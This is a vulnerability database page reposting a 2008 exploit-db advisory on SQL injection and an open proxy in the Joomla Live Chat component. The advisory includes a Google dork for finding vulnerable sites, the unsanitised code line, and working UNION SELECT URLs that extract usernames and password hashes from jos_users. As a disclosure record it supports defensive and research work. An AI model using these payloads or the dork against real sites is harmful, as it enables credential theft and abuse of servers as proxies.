Lucene search
+L

Joomla! Component live chat - SQL Injection / Open Proxy

🗓️ 12 Dec 2008 00:00:00Reported by jdcType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Joomla Live Chat component SQL Injection and Open Prox

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-6881
12 Dec 200800:00
circl
Circl
CVE-2008-6882
12 Dec 200800:00
circl
Circl
CVE-2008-6883
12 Dec 200800:00
circl
CVE
CVE-2008-6881
30 Jul 200919:00
cve
CVE
CVE-2008-6882
30 Jul 200919:00
cve
CVE
CVE-2008-6883
30 Jul 200919:08
cve
Cvelist
CVE-2008-6881
30 Jul 200919:00
cvelist
Cvelist
CVE-2008-6882
30 Jul 200919:00
cvelist
Cvelist
CVE-2008-6883
30 Jul 200919:08
cvelist
EUVD
EUVD-2008-6841
7 Oct 202500:30
euvd
Rows per page
Joomla Live Chat

http://www.joompolitan.com/livechat.html

Google Dork: allinurl:option=com_livechat

author: jdc


SQL Injections:

administrator/components/com_livechat/getChat.php && administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last':


$last = (isset($_GET['last']) && $_GET['last'] != '') ? $_GET['last'] : 0;
--------------------------------------------------------^

administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users

administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users


Open Proxy ( sends HTTP_FORWARDED ):

administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com


# milw0rm.com [2008-12-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Dec 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02287
31